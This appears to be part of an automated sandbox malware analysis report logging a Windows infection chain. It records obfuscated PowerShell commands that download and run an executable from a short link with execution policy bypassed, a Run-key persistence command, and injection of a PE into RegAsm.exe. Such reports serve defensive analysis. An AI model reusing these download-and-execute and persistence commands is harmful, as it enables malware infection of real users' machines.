                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\ntrwe.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\ntrwe.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\ntrwe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1484Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1836Thread sleep count: 187 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 2964Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\ntrwe.exe TID: 1476Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Users\user\ntrwe.exe TID: 1476Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\ntrwe.exe TID: 1900Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\ntrwe.exe TID: 1544Thread sleep count: 156 > 30Jump to behavior
                Source: C:\Users\user\ntrwe.exe TID: 1192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\ntrwe.exe TID: 2492Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 2492Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 2500Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1776Thread sleep count: 185 > 30
                Source: C:\Users\user\ntrwe.exe TID: 2784Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,17_2_00403D74
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: 12.exe, 0000000B.00000003.2176518302.00000000082B9000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040317B mov eax, dword ptr fs:[00000030h]17_2_0040317B
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00402B7C GetProcessHeap,RtlAllocateHeap,17_2_00402B7C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\12.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Users\user\ntrwe.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\ntrwe.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write
                Bypasses PowerShell execution policyShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
                Writes to foreign memory regionsShow sources
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000Jump to behavior
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000Jump to behavior
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000Jump to behavior
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe' Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'Jump to behavior
